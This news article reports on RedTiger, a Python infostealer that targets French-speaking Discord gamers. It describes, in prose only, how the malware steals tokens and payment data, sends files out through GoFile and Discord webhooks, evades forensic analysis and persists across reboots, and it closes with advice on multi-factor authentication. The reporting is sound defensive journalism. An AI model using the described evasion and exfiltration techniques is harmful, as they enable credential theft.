A new data-stealing MALWARE called RedTiger is being used by cybercriminals to target gamers on the popular chat platform Discord. Cybersecurity firm Netskope reported this targeted campaign last week, noting that, for now, its focus seems to be on French Discord users.
According to researchers, this open-source Python-based tool, initially designed for security testing, has unfortunately been adopted by cybercriminals to create an infostealer.
What RedTiger Steals
RedTiger is designed to primarily target your Discord account and browser databases by inserting its own code into the app. The malware is capable of stealing different types of data, starting with your authentication tokens (digital keys for your account) to grab details like your username, email, security settings (MFA), and subscription level.
More importantly, it steals bank payment information (like credit cards and PayPal) saved within Discord. However, for long-term access, RedTiger modifies the Discord program itself to quietly watch all activity. This means even if you change your Discord password, the malware can still intercept and steal your new credentials and tokens.
Other than Discord, RedTiger also steals saved browser data (passwords, payment info), game files (e.g., Roblox), cryptocurrency wallet information, screenshots, and can secretly take photos using your webcam. Netspoke’s analysis suggests the attackers are mainly targeting gamers, especially French-speaking users.
Evasion and Persistence
Once a machine is infected, RedTiger quickly steals data and conceals its activity. The process occurs in two stages. First, the malware gathers all the stolen data, compresses it, and uploads the complete file to the anonymous file-sharing site GoFile.
Next, it sends a secret alert to the attacker through a Discord webhook, an automated message system that delivers the download link to the stolen data along with key details about the victim’s computer, including IP address, country, and hostname.
In their blog post, researchers noted that the tool is built to evade detection because it shuts down immediately if it spots security tools like debuggers or forensic environments. Also, to hide its tracks, RedTiger uses a trick called “mass file and process spamming,” which creates about 100 random files and launches roughly 400 different programs at the same time. Netskope researchers observed that this is done to “hinder forensic analysis by flooding the timeline with meaningless artifacts.”
The malware also includes a persistence mechanism available across Windows, Linux, and macOS (Darwin) systems to survive reboots. On Windows, it is fully functional, adding the payload to the startup folder to run automatically at login. While the script copies itself to auto-start folders on Linux and macOS, this feature is currently incomplete, failing to execute without final configuration files.
Expert’s Analysis:
The rise of RedTiger shows a disturbing trend where legitimate tools are being turned into malicious ones. Mayank Kumar, Founding AI Engineer at DeepTempo, shared his views regarding this development, stating:
“Malicious actors can freely audit, modify, and repurpose these same legitimate tools for offensive operations… Attackers are effectively leveraging the tool’s intended capabilities for data collection and repackaging it with social engineering lures.”
“This type of campaign relies on a mix of technical ability and psychological tricks, hiding the malware within seemingly harmless applications to gain access. Kumar stresses that this incident “reinforcing the critical need for multi-factor authentication (MFA) to mitigate the impact of credential theft and robust user skepticism toward unsolicited software.”
To stay safe, experts strongly recommend you always use Multi-Factor Authentication (MFA) on your Discord and other high-value accounts, and be extremely careful about downloading any new software, mods, or utilities that come from unverified sources.
